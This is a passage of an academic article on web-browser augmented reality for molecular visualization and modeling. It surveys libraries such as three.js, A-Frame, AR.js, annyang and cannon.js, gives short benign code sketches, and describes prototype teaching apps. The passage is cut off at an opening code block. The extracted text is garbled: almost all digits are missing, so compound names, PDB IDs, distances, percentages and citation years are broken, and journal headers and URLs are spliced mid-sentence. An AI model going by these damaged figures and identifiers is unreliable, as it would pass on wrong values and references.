interfaces allow handling molecules over degrees of freedom and with both hands, in immersive d. they are expected to overcome the limitations of traditional software based on screen, mouse and keyboard, thus enabling more intuitive, fluid exploration of molecular features and data. at the time of writing, most of these works are not complete ar or vr versions of fully-fledged programs, but rather prototypes, proofs of concept and case studies on how humans interact with virtual molecules in ar or vr. notable highlights moving towards complete immersive molecular visualization and modeling programs are the new rewrite of chimera, chimerax, which was optimized for the new gpus and incorporates support for vr experiences (goddard et al., b), vrmol (xu et al., ), new vr plugins for the vmd molecular graphics program (stone, ), and a few commercial programs like autodesk’s molecule viewer (https://autodeskresearch.com/groups/lifesciences) or nanome (https://nanome.ai/), all with interfaces specifically tailored for vr. most of these works suffer from two severe limitations. first, all but a few exceptions require hardware such as head-mount displays (helmets, headsets or goggles like ms hololens, oculus rift, htc vibe, etc.) or immersive installations with large surround screens plus d-handheld input devices and the corresponding computer and gpu hardware. the few remarkable exceptions are prototypes using ordinary webcam-enabled smartphones (balo, wang & ernst, ) or laptops (gillet et al., ). the second limitation is the need of specialized programs that often must be correctly interfaced to couple the different components required for an ar or vr experience, that is, tracking limbs, handheld devices or ar markers, then running calculations on molecular data, and finally displaying results and molecular graphics on screen (see ratamero et al., ; gillet et al., ). some of these programs are only compatible with specific vr devices and many are not free software. 
overall, then, despite the dropping costs, access to these tools still requires investment in the order of hundreds to low-thousand american dollars per abriata ( ), peerj comput. sci., doi . /peerj-cs. / https://autodeskresearch.com/groups/lifesciences https://nanome.ai/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ user, and software interfacing that may not be available to lay students and teachers. it is therefore unlikely that vr will achieve the ideal of one device per student within the next few years. to date, these solutions are not widely used across the world, and their costs make them totally out of reach for educational centers in developing countries. additionally, most current setups are limited to vr, but it has been shown that ar is more suited for educational purposes because by not occluding the view of the user’s own limbs, it results in better motion coordination and object handling than vr (sekhavat & zarei, ; gaffary et al., ; krichenbauer et al., ). furthermore, in ar the view of the world is not obstructed thus allowing students and teachers to interact more easily. the purpose of this work is to demonstrate that client-side web technologies have matured enough to enable web pages for ar-based molecular visualization and modeling running just on web browsers in regular webcam-equipped computers. this enables the easy creation of immersive educational material that can be employed by students and teachers at very affordable costs and with very simple setups. all they must do is access a webpage, enable webcam activity in the browser, and show to the webcam a printed ar marker on which the molecules will be displayed. from the developer side, the code is made simple thanks to a large number of libraries; in fact visualization-only applications are achievable just with html code while interactivity can be incorporated through custom javascript. this article is organized in two parts. part provides a practical overview of the main building blocks available as of to program ar apps in web pages, with a focus on ways to achieve molecular visualization and modeling. it also briefly explores ways to handle gesture- and speech-based commands, molecular mechanics, calculation of experimental observables, concurrent collaboration through the world wide web, and other human- computer interaction technologies available in web browsers. part of the article showcases prototype web apps for specific tasks of practical utility in pedagogical and research settings. these web apps are based on open, commodity technology that requires only a modern browser “out of the box”, so educators, students and researchers are free to try out all these examples on their computers right away by following the provided links. part : overview of building blocks for immersive molecular modeling in web browsers virtual and augmented reality at the core of immersive experiences are visualizations based on vr or ar methods. while vr is probably best experienced with vr goggles to suppress any side view of the real world, ar is more amenable to devices like desktop or laptop computers, tablets and smartphones, making it better suited for commodity solutions, and has the additional advantages outlined in the introduction. the methods presented in this article make use of marker-based ar in a web-based setup that functions as an “ar mirror” where the user sees him/herself with the virtual objects, here molecules, overlaid on the markers he/she holds in their hands (figs. a and b). 
the following descriptions focus on this technology and how it can be implemented in web apps by using html, css and javascript code as standard web pages that are hosted at servers but run entirely on local computers (fig. c). the webgl api provides powerful d and d graphing capabilities using gpu resources, in a format fully integrable with other html elements, apis and javascript libraries, without the need of plug-ins; and is highly standardized across browsers. it is thus possible to couple all elements required to build up an ar experience directly inside the web page source code. a handful of javascript libraries exploit webgl to facilitate rendering of d scenes, three.js (https://threejs.org/) being probably the most widely used. in turn, tools like a-frame (https://aframe.io/) provide entity component system frameworks that wrap three.js into html language tags through polyfills, greatly facilitating the development of ar and vr scenes. the examples presented in part showcase either direct use of three.js or of three.js through a-frame for ar. these libraries/frameworks can be used either by (i) loading pre-made models of the molecular systems in formats like wavefront's obj+mtl files exported straight out of molecular visualization programs like vmd (humphrey, dalke & schulten, ), unitymol (doutreligne et al., ; wiebrands et al., ), chimerax (goddard et al., b), etc., possibly further edited with a program like blender as in martínez-hung, garcía-lópez & escalona-arranz ( ); or (ii) employing d primitives (like spheres, cylinders, etc.) to draw the molecular systems from scratch with their atomic coordinates. use of wavefront models is much simpler (only a few lines of html code to load and display objects) and allows seamless display of any element exported from molecular graphics programs, including not only different representations of molecules but also isosurfaces as those needed to visualize volumetric data describing molecular orbitals, electron microscopy maps, etc. on the other hand, using d primitives requires larger pieces of code to create all d objects from atomic coordinates, but in turn allows for fine dynamic control of shapes, sizes, colors, and positions, which are key to interactivity. another downside of wavefront models is that files can become quite large for high-resolution textures. figure commodity augmented reality in web browsers. (a) ar markers "hiro" and "kanji" are built into ar.js and its a-frame wrap. figure s shows them ready to print at various sizes. custom markers including cube markers are also implementable. (b) in the proposed web apps the ar library feeds coordinate information to the graphics libraries and other algorithms. (c) the web pages must be hosted in servers compatible with the https protocol, but their content then runs exclusively on the computer. object detection and tracking the other key component required for ar and vr is a means to detect and track objects or parts of the user's body such as his/her hands, in order to manipulate virtual objects.
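to illustrate the coupling summarized in fig. b, the sketch below shows how a marker pose estimated by a tracking library can drive a three.js object holding the molecular model. it is only a sketch under the assumption that the tracking code delivers a 16-element, column-major 4x4 pose matrix per video frame; the callback names and their wiring are placeholders rather than the api of any specific library.

```javascript
// Minimal sketch: a tracked marker pose drives a three.js group holding the model.
import * as THREE from 'three';

const scene = new THREE.Scene();

// Group that will contain the molecular model (spheres, sticks, an OBJ mesh, ...)
const molecule = new THREE.Group();
scene.add(molecule);

// The tracker supplies the full transform, so disable automatic matrix updates.
molecule.matrixAutoUpdate = false;
molecule.visible = false;

// Hypothetical callback, to be wired to whichever tracking library is used:
// `pose` is assumed to be a 16-element, column-major 4x4 matrix for the marker.
function onMarkerFound(pose) {
  molecule.matrix.fromArray(pose); // place the model on the physical marker
  molecule.visible = true;
}

// Hypothetical callback for frames in which the marker is not detected.
function onMarkerLost() {
  molecule.visible = false;
}

// The usual three.js camera/renderer setup and render loop are omitted here.
```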
applications using ad hoc hardware use sensors and cameras that track the user’s position in space and handheld controllers that the user sees as virtual tweezers or hands, to directly move objects in space. for commodity ar/vr in web browsers, solutions rely on javascript versions of tracking libraries that implement computer vision algorithms through the webcam feed, like artoolkit (kato, ) among other similar solutions. these libraries track user-defined d markers (like those in fig. a; figs. s and s ) in space and make their computed coordinates available to the graphics algorithms. two especially interesting libraries, used in many of the examples presented in part , are ar.js (https://github.com/jeromeetienne/ar.js) and its a-frame wrap (https://jeromeetienne. github.io/ar.js/aframe/). these enable highly simplified ar/vr, even using exclusively html code for simple developments. it is important to note that in marker-based ar different viewers looking at the same physical marker receive different perspectives of it and hence of the rendered virtual object, just as if it was a real object in real space (fig. s ). this easily enables multi-user ar in a common room, as would be useful in a classroom setting where students and teachers look at the same virtual molecule. an alternative to traditional marker-based ar should in principle be possible by using a plain hand tracking javascript library like handtracking.js. another slightly more expensive approach but possibly better in tracking performance is using a device like the infrared-based leap motion controller (https://www.leapmotion.com/), which includes a javascript library to feed positional information from the device into the web app. unfortunately, however, there are currently no ready-to-use libraries that couple these input tools to webgl graphics, so their use would require further developments. current javascript libraries for computer vision allow even more complex object tracking. one interesting example is gesture recognition by the webgazer.js library, which abriata ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- https://github.com/jeromeetienne/ar.js https://jeromeetienne.github.io/ar.js/aframe/ https://jeromeetienne.github.io/ar.js/aframe/ http://dx.doi.org/ . /peerj-cs. /supp- https://www.leapmotion.com/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ analyzes face features to estimate where on the screen the user is looking at (papoutsaki et al., ). in molecular visualization, this can be used for example to automatically rotate regions of interest to the front of the field of view, as shown in fig. s . speech-based interfaces a speech-based interface can be very useful for situations in which the user’s hands are busy holding objects, as in ar/vr applications. in-browser speech recognition apis enable implementation of speech recognition very easily, especially through libraries like annyang (ater, ) which is used in some of the examples of this article. these libraries usually allow working in two modes, one where the browser waits for specific commands (while accepting variable arguments) and one where the browser collects large amounts of free text that are then made available to the environment. the former allows direct activation of functions without the need for the user to click on the screen. 
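as a minimal sketch of this first, command-based mode, registering voice commands with annyang takes only a few lines; the spoken phrases and the showRepresentation and toggleSpin functions below are placeholders for whatever actions a given web app exposes, not part of the library itself.

```javascript
// Minimal sketch of command-based speech input with annyang
// (https://github.com/TalAter/annyang), loaded e.g. via a <script> tag.
if (window.annyang) {
  // ':rep' is a named variable captured from the spoken phrase,
  // e.g. "show cartoon" or "show sticks".
  const commands = {
    'show :rep': function (rep) {
      showRepresentation(rep); // placeholder: app-specific drawing function
    },
    'spin molecule': function () {
      toggleSpin();            // placeholder: app-specific action
    }
  };
  annyang.addCommands(commands);
  annyang.start();             // begins listening through the microphone
}
```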
the second option opens up the possibility of automatically detecting subjects, actions and concepts that are fed to artificial intelligence routines, or just predefined rules, that the computer will analyze in background. for example, when two users are discussing the interaction surface between two proteins and mention certain residues, the computer could automatically mine nih’s pubmed repository of papers for mentions of said residues. this may seem far-fetched, but is essentially the same technology that underlies automatic advertising and suggestions based on users’ various inputs and usage statistics in software and websites. the problem of intelligently suggesting chemical and biological information related to a topic or object has already been addressed for some time, for example in information augmentation tools like reflect (pafilis et al., ) and advanced text-mining tools (rebholz-schuhmann, oellrich & hoehndorf, ). the evolution of science-related standards are very important in this regard, formats and content for the semantic web (hendler, ) and of machine-readable scientific databases and ontologies that standardize knowledge and data. intensive calculations as recently reviewed in a dedicated issue of computing and science in engineering (dipierro, ), javascript has become very powerful by including language subsets specialized for speed, optimized just-in-time compilation, methods to program background scripts, and libraries to perform multi-core and on-gpus computing to accelerate intensive calculations. it is in fact now possible to transpile from c/c++ and other languages directly to javascript retaining close-to-native execution speeds, allowing web browsers to support quite complex data analysis and visualization directly in web pages (abriata et al., ; abriata, a). this opens up the possibility of simulating molecular mechanics and experimental data, performing numerical data analysis and even handling data in neural networks, directly inside the molecular modeling web app to enable real-time feedback as the user manipulates the molecular systems. some of the prototypes presented in part include such examples. rather than manually implementing calculations, a number of libraries are now available for specific applications that help to save code writing time and bring the abriata ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ additional advantage of being developed by specialists (abriata, a). one particularly useful library in the scope of this paper is cannon.js (https://schteppe.github.io/cannon.js/), an engine for simulating rigid body mechanics that integrates smoothly with three.js and a-frame. these engines use numerical methods to propagate motions of solid bodies connected by springs and other physical constraints in an approximate but efficient way, thus adding realistic physics to the d bodies of ar and vr worlds. although these engines do not account for all the forces and phenomena of the atomic realm, such as electrostatic interactions and quantum phenomena, they are useful in certain real scenarios of molecular modeling. for example, the integrative modeling platform software (used to put together partial structures into bigger assemblies, driven by experimental data) includes one such kind of physics engine for molecule-molecule docking (russel et al., ). 
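to give an idea of how little code such an engine needs, the sketch below connects two coarse-grained beads with a spring in cannon.js and steps the simulation; the radii, masses and spring parameters are arbitrary illustrative values, not a calibrated force field.

```javascript
// Two beads connected by a spring, integrated with cannon.js
// (https://schteppe.github.io/cannon.js/), e.g. loaded via a <script> tag.
const world = new CANNON.World();
world.gravity.set(0, 0, 0);           // no gravity at the molecular scale

function makeBead(x) {
  const bead = new CANNON.Body({
    mass: 1,                          // arbitrary mass
    shape: new CANNON.Sphere(0.5),    // arbitrary radius
    position: new CANNON.Vec3(x, 0, 0)
  });
  world.addBody(bead);
  return bead;
}

const beadA = makeBead(-1);
const beadB = makeBead(1);

// Harmonic restraint between the two beads (a crude "bond")
const spring = new CANNON.Spring(beadA, beadB, {
  restLength: 1.5,                    // arbitrary equilibrium distance
  stiffness: 50,
  damping: 1
});

// Apply the spring force around every physics step
world.addEventListener('postStep', () => spring.applyForce());

// Advance the simulation (e.g. called from the rendering loop)
function stepPhysics() {
  world.step(1 / 60);                 // fixed 60 Hz time step
}
```

the updated bead positions can then be copied onto the corresponding three.js or a-frame objects on every rendered frame.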
furthermore, implementation of more complex force fields is certainly possible, as exemplified by a javascript transpilation of the openmd molecular dynamics engine (jiang & jin, ). further building blocks any other technology that facilitates interaction with the computer within a d environment, either to deliver or obtain information, might be of use. for example, haptic feedback would be desirable to confer a physical feel of interactions and clashes as in (wollacott & merz, ; stocks, hayward & laycock, ; stocks, laycock & hayward, ; matthews et al., ). achieving a good experience in haptic feedback currently requires specialized devices, and is an area of active research (bolopion et al., , ), therefore it does not fit with the commodity hardware criteria outlined in the introduction. other rudimentary ways to achieve sensory feedback include exploiting built-in vibration devices and touch-pressure sensing in touch screens, both handled by javascript apis. finally, a particularly interesting aspect of software running on web browsers is the ease with which different users can connect to each other, just over the internet. web apps can exploit web sockets to achieve direct browser-to-browser links over which data can be transmitted freely, with a server only intervening to establish the initial connection (pimentel & nickerson, ). for example, two or more users can concurrently work on a jsmol session by sharing just mouse rotations and commands, appearing on all other users’ screens with a minor delay (abriata, b). such collaborative working technology could be adapted to complex immersive environments to allow multiple users to work on chemical problems at a distance, essential for scientific collaborations, demonstrations, and online teaching (lee, kim & kang, ). part : prototype web apps showcasing example applications this section presents example ar web apps compatible with major web browsers in modern computers, introducing features of increasing complexity. all examples were verified to run out of the box in multiple web browsers on windows, linux and macos operating systems, in laptop and desktop computers. all the examples are accessible through links in table and at https://lucianoabriata.altervista.org/papersdata/tablepeerjcs .html, which abriata ( ), peerj comput. sci., doi . /peerj-cs. / https://schteppe.github.io/cannon.js/ https://lucianoabriata.altervista.org/papersdata/tablepeerjcs .html http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ further contains links to demo videos. to run these examples the user needs to print the hiro, kanji or cube markers as needed in each case (fig. a; figs. s and s , and links on web pages). for simpler handling, flat markers (hiro and kanji) may be glued on a flat surface mounted on a device that can be easily rotated from the back, such as a small shaft perpendicular to the marker plane. the cube marker is printed in a single page, folded and possibly glued to a solid cube made of wood, plastic, rubber or similar material. readers interested in the inner workings and in developing content can inspect the source code of each webpage (ctrl+u or cmd+u in most browsers). several recommendations and basic troubleshooting for developers and users are given in table . introducing web browser-based ar for visualization the simplest way to achieve ar in web pages consists in displaying on the ar markers representations exported from programs like vmd (humphrey, dalke & schulten, ) in wavefront (obj+mtl) format. 
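the next paragraph describes how little markup this takes; as a hedged sketch (the script urls, the obj/mtl file names and the scale factor are illustrative placeholders, not the exact assets behind the figures), such a page can look like the following.

```html
<!DOCTYPE html>
<html>
  <head>
    <!-- A-Frame plus the AR.js build for A-Frame; version numbers are placeholders -->
    <script src="https://aframe.io/releases/0.9.2/aframe.min.js"></script>
    <script src="https://jeromeetienne.github.io/AR.js/aframe/build/aframe-ar.js"></script>
  </head>
  <body style="margin: 0; overflow: hidden;">
    <a-scene embedded arjs="sourceType: webcam;">
      <a-assets>
        <!-- obj+mtl files exported from a molecular graphics program (placeholder names) -->
        <a-asset-item id="mol-obj" src="molecule.obj"></a-asset-item>
        <a-asset-item id="mol-mtl" src="molecule.mtl"></a-asset-item>
      </a-assets>
      <!-- the model appears whenever the printed hiro marker is in view -->
      <a-marker preset="hiro">
        <a-obj-model src="#mol-obj" mtl="#mol-mtl" scale="0.05 0.05 0.05"></a-obj-model>
      </a-marker>
      <a-entity camera></a-entity>
    </a-scene>
  </body>
</html>
```

served over https, a page of this kind asks for webcam permission and overlays the exported model on a printed hiro marker.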
this can be achieved with a few lines of html code thanks to libraries like ar.js for a-frame, enabling the very easy creation of content for displaying any kind of object handled by the exporting program. figure a exemplifies this with a small molecule, -bromo-butane, shown as balls and sticks. this small molecule is chiral at carbon ; the hiro marker displays its r enantiomer while the kanji marker displays the s enantiomer, both rendered from the same pair of obj+mtl files but scaled as required for chirality inversion. figure b shows on the hiro marker a protein table links to all web examples arranged by figure. see https://lucianoabriata.altervista.org/papersdata/tablepeerjcs .html for an online version of the table which also includes links to several video demonstrations. figure a https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/ brbutane.html b and c https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/pdb- vyq- fjl.html d https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/bacteriophage.html e https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/xray hyd.html f https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/bh nh orb.html g https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/ubiquitinandnesatomistic.html h https://lucianoabriata.altervista.org/jsinscience/arjs/jsartoolkit /pdbloader .html figure a https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/smallmolclashdetection.html and https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/smallmolprotontransfer.html b https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/smallmoldielsalder.html c https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/metmyoglobinfe pcshift.html figure a https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/ubiquitinuimffvoicesaxs.html b https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/coevol_ qop.html figure a– c https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/ubiquitin-uim-cannon.html abriata ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- https://lucianoabriata.altervista.org/papersdata/tablepeerjcs .html https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/ brbutane.html https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/pdb- vyq- fjl.html https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/bacteriophage.html https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/xray hyd.html https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/bh nh orb.html https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/ubiquitinandnesatomistic.html https://lucianoabriata.altervista.org/jsinscience/arjs/jsartoolkit /pdbloader .html https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/smallmolclashdetection.html https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/smallmolprotontransfer.html https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/smallmoldielsalder.html https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/metmyoglobinfe pcshift.html https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/ubiquitinuimffvoicesaxs.html https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/coevol_ qop.html https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/ubiquitin-uim-cannon.html http://dx.doi.org/ . 
complex rendered as cartoons with small molecule ligands rendered as sticks (pdb id vyq, same example used by berry & board ( )); and fig. c shows a cartoon representation of a protein bound to a short segment of double-stranded dna rendered as sticks (from pdb id fjl) spinning on the kanji marker. figure d exemplifies the display of vmd isosurfaces to show a volumetric map of a bacteriophage attached to its host as determined through electron microscopy (emdb id ). two further examples feature combined representations of atomic structure and volumetric data: fig. e shows a small peptide rendered as sticks and docked inside the experimental electron map shown as a mesh (from pdb id hyd), and fig. f shows the frontier molecular orbitals of bh and nh (from wavefront files kindly provided by g. frattini and prof. d. moreno, iquir, argentina).

table requirements and troubleshooting for developers and users.

developers, software and hardware requirements:
* ensure using https urls; otherwise webcams will not activate.
* free web hosting services work, as web pages only need to be hosted but run in the client.
* given the regular updates in w c standards, apis and libraries, routine tests are recommended to ensure normal functioning.
* examples from this paper were verified to work "out of the box" on safari in multiple macos .x versions and on multiple chrome and firefox versions in windows , windows , linux redhat enterprise edition, ubuntu and archlinux.
* support in tablets and smartphones is currently limited and heterogeneous, so these devices are not recommended.

users, software and hardware requirements:
* need a webcam- and internet-enabled computer (desktop or laptop).
* enable the webcam when prompted.
* javascript and webgl must be enabled in the browser (that is a default setting).
* check that ad blockers and firewalls do not block the webcam and other content.
* pages containing large wavefront files may take time to load (half to a few minutes).

augmented reality markers:
* print on a regular printer; try different sizes for different applications.
* when using hiro and kanji markers, ensure they are printed at the same size.
* ensure that markers have a white frame around the black drawing, at least % of size.
* to improve marker recognition, avoid glossy papers; opaque paper is best.
* lighting may also affect the quality of the ar experience.
* markers are easier to handle if glued on solid surfaces (but avoid wrinkles).
* the cubic marker can be glued onto a solid rubber cube cut to the appropriate size.

the next level of complexity is building up scenes from d primitives, which brings the advantage over ready-made models that all the elements can be handled independently, thus allowing the possibility of incorporating interactivity. this can be achieved either through a-frame with ar.js, thus requiring only html code for display as in the wavefront-based examples above, or through libraries that require additional javascript code but in turn enable more complex functionalities. exemplifying the former case, fig. g uses a-frame spheres and cylinders placed at coordinates computed from atomic positions, colored by atom type and assigned atom-specific radii, to render a model of a small protein helix on the kanji marker. the latter case of using pure javascript is
figure different implementations of webgl for ar in web browsers.
(a) -bromo-butane enantiomers r and s displayed on hiro and kanji markers, respectively, from wavefront objects pro- duced in vmd. (b) a protein complex rendered as cartoons with small molecule ligands shown as sticks on the hiro marker (pdb id vyq). (c) a double-stranded segment of dna (sticks) bound to a homeodomain protein (cartoon) spinning on the kanji marker (pdb id fjl). both b and c were rendered from vmd wavefront objects. (d) volumetric map of a bacteriophage attached to a portion of the host’s cell wall as determined through electron microscopy (emdb id ) and prepared as vmd wavefront object showing the capsid in gray, the needle in blue and the membranes in orange. (e) a small peptide inside its electron density map as determined by x-ray diffraction (pdb id hyd). (f) homo and lumo orbitals from nh and bh molecules, rendered from wavefront objects. (g) representation of an amphipathic alpha helix built from primitives, viewable on the kanji marker. (h) use of a cube marker (made up of six different ar markers in its faces) to load any molecule in pdb format and handle and visualize it in d. graphics built from three.js primitives. the example also uses cannon.js to simulate rigid body dynamics by fixing the distances between atoms separated by one or two bonds but allowing rotations, in analogy to plastic-made molecular modeling kits. full-size doi: . /peerj-cs. /fig- abriata ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ illustrated by the jsartoolkit library (https://github.com/artoolkit/jsartoolkit ), in an example where six markers arranged on the faces of a cube are coupled to drive a single object in full d. lastly, combining this with direct use of three.js to draw d primitives, the web app in fig. h allows visualization and manipulation of any molecule loaded in pdb format in full d, in this case (d)-glucopyranose. adding interactivity: examples on small molecules web apps using a-frame can gain interactivity through portions of javascript code that read atom coordinates and carry out calculations on them. figure shows another series of examples of increasing complexity, focusing on small molecules. in fig. a, the user drives a lysine side chain with the hiro marker and a glutamate side chain with the kanji marker. each molecule is anchored to the center of its corresponding ar marker through its alpha carbon atom. their protonation states correspond to neutral ph, so lysine is protonated hence its n atom (blue) is charged by + , whereas glutamate is deprotonated hence its o atoms (red) bear a total charge of − . through simple javascript code the web app (i) represents with yellow dots the vector connecting the lysine’s n atom and one of the glutamate’s o atoms; (ii) reports the distance between these atoms and the corresponding attractive electrostatic force in real time; and (iii) checks for and displays clashes between any pair of atoms of the two molecules. the code for (i) is wrapped inside figure introducing interactivity. (a) a lysine and a glutamate side chain attached to different ar markers, whose coordinates are processed in real time to deliver distance and electrostatic potential between charged groups and to calculate and display clashes. graphics achieved with a-frame polyfills. in this example the ratio of protonated lysine to glutamate exchanging dynamically is set to / = . 
, that is, favoring protonated lysine as the actual water chemistry dictates but shifted orders of magnitude from the real ratio of acidic constants so that the user can observe temporal protonation of both amino acids in the timescale of work. (b) a diels-alder reaction, taking place once the user has moved the reagents close enough in space; this example further helps to visualize fused cycles (as the diene reagent was a cyclic molecule itself). (c) example of interactively probing experimental observables: as a probe atom (black sphere) is moved around a paramagnetic center, the user sees the paramagnetic effects simulated at the location of the probe atom in real time. full-size doi: . /peerj-cs. /fig- abriata ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/artoolkit/jsartoolkit http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ an auxiliary .js file, and the code for (ii) and (iii) is located between <script> tags at the end of the html file. the distance, electrostatic and clash calculations are computed inside a setinterval() function every ms, and use the id attribute of the sphere tags to locate the atomic coordinates. the distance calculation includes a correction for a zoom factor that scales atom sizes and positions when the molecular coordinates are parsed into a-frame html to properly fit the screen. clashes are detected when two spheres are within Å and displayed as semitransparent a-frame spheres centered on the affected atoms. a modified version of this example is also provided, incorporating a very simplistic emulation of hydrogen bond detection and proton transfer (second link for fig. a in table ). javascript code calculates and displays hydrogen bonds when the geometry permits, and randomly “transfers” one proton from lysine’s n atom to one of the o atoms of glutamate if the lysine is protonated, or the other way around (actually spheres attached to each marker are hidden or shown as needed to emulate proton transfer). protons “jump” only when they are within Å of the receiving n or o atom; and they are set to jump back and forth to reflect % time-averaged population of protonated lysine and % of protonated glutamate, to convey the feeling of different acidic constants ( −pka) favoring protonation of the base. when Å < n–o distance < Å the web app displays a yellow dotted line that represents a hydrogen bond between the potential receiver heavy atom and the involved proton. similar emulation strategies could be easily used to build “interactive animations” for exploring chemical and physical phenomena of much pedagogical use, as in the phet interactive simulations (moore et al., ) but using ar to directly, almost tangibly, handle molecules. for example, the app shown in fig. b illustrates stereoselectivity in the diels-alder reaction in interactive d. this reaction occurs between a dienophile and a conjugated diene in a concerted fashion, such that the side of the diene where the initial approach occurs defines the stereochemistry of the product. the web app in this example allows users to visualize this in d as they approach a molecule of , -cyclohexadiene on the hiro marker to a molecule of chloroethene on the kanji marker. as the two pairs of reacting c atoms approach each other, the new bonds gain opacity until the product is formed. 
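a rough sketch of how this kind of distance-driven visual feedback can be coded is shown below. it is a simplified, hypothetical example written for this text rather than the app's actual code: element ids, radii, distances and the refresh interval are invented, and in the real pages the atoms are children of <a-marker> entities so that they follow the printed markers. two spheres stand for the approaching carbon atoms, and a third semi-transparent object fades in between them as their separation shrinks, in the same spirit as the setinterval() loops described above.

```html
<!-- assumes a-frame (and, for ar, ar.js) is loaded in the page <head> -->
<a-scene embedded>
  <!-- hypothetical stand-ins for two reacting carbon atoms -->
  <a-sphere id="dieneC" color="gray" radius="0.3" position="-1 1 -3"></a-sphere>
  <a-sphere id="dienophileC" color="gray" radius="0.3" position="1 1 -3"></a-sphere>
  <!-- stand-in for the nascent bond: fades in as the two atoms approach -->
  <a-sphere id="newBond" radius="0.12"
            material="color: white; opacity: 0; transparent: true"></a-sphere>
</a-scene>

<script>
  var BOND_DISTANCE = 0.8;   // illustrative separation at which the bond is fully formed
  setInterval(function () {
    var a = document.querySelector('#dieneC');
    var b = document.querySelector('#dienophileC');
    var bond = document.querySelector('#newBond');
    if (!a.object3D || !b.object3D) { return; }   // entities not initialized yet
    var pa = a.object3D.getWorldPosition(new THREE.Vector3());
    var pb = b.object3D.getWorldPosition(new THREE.Vector3());
    var d = pa.distanceTo(pb);
    // opacity ramps from 0 (atoms far apart) to 1 (atoms at bonding distance)
    var opacity = Math.max(0, Math.min(1, (2 * BOND_DISTANCE - d) / BOND_DISTANCE));
    bond.object3D.position.copy(pa).lerp(pb, 0.5);   // keep the highlight between the atoms
    bond.setAttribute('material', 'opacity', opacity);
  }, 100);   // arbitrary refresh interval for this sketch
</script>
```

the same pattern of reading entity positions inside a periodic callback and updating attributes in response underlies the clash, hydrogen-bond and proton-transfer emulations described above.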
additionally, the product formed in this reaction is by itself an interesting molecule to visualize and manipulate in ar, because it contains two fused six-membered rings which are hard to understand in d. it should be noted that the examples provided here emulating reactivity are merely pictorial visualizations of the mechanisms, and not based on any kind of quantum calculations. such calculations are too slow to be incorporated into immersive experiences where energies need to be computed on the fly. however, novel machine learning methods that approximate quantum calculations through orders-of-magnitude faster computations (smith, isayev & roitberg, ; bartók et al., ; paruzzo et al., ) could in the near future be coupled to ar/vr systems to interactively explore reactivity in real time. obviously, such tools could be useful not only in education but also in research, for example to interactively test the effect of chemical substituents on a reaction, estimate effects on spectroscopic observables, probe effects of structural changes on abriata ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ molecular orbitals, etc. it is already possible to integrate ar/vr with a physics engine, to add realistic mechanics to the simulation. the web app in fig. h uses cannon.js to simulate thermal motions and thus give a sense of dynamics to the visualized system. in this web app, cannon.js handles the multi-atom system by treating atoms as spheres of defined radii connected by fixed-distance constraints and whose velocities are continuously updated to match the set temperature, leading to rotations around bonds. however, extension of cannon.js to include additional force field terms like dihedral angle terms and electrostatic interactions would be needed to achieve a more complete and realistic modeling experience. ar-based modeling of biological macromolecules figures and already include examples for visualizing certain biological macromolecules, and the previous section introduced ways to incorporate interactivity into these web apps. this section digs deeper into the development of interactive content more relevant to education and research in structural biology, by exploring the incorporation of restraints, simple force fields and on-the-fly simulation of experimental observables for biological macromolecules. the example in fig. c uses javascript to calculate paramagnetic effects on the nuclear magnetic resonance signal of a probe atom (black) attached to the kanji ar marker, as it is moved around the heme group of metmyoglobin attached to the hiro ar marker. by applying standard equations (bertini, turano & vila, ) on the atomic coordinates, this web app simulates the dipolar effects of the paramagnetic iron ion on the probe atom and displays the resulting contribution to the nmr spectrum using the google charts javascript library (https://developers.google.com/chart). the web app shown in fig. a allows exploration of the interaction space of two proteins that are known to form a complex in solution, specifically ubiquitin (red trace) and a ubiquitin-interacting motif (uim, blue trace) taken from pdb id d g (hirano et al., ). the web app simulates on-the-fly the small-angle x-ray scattering (saxs) profiles expected from the relative arrangement of the two proteins, and displays them overlaid onto an experimental profile in real time as the user moves the proteins. 
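the underlying computation can be illustrated with a toy version of the debye equation, i(q) = sum over i and j of f_i f_j sin(q r_ij)/(q r_ij). the sketch below sets all form factors to 1 and uses invented coordinates and q values; as explained below, the actual app iterates over residue-level scattering centers rather than atoms, so this is only an indication of the kind of double loop involved.

```javascript
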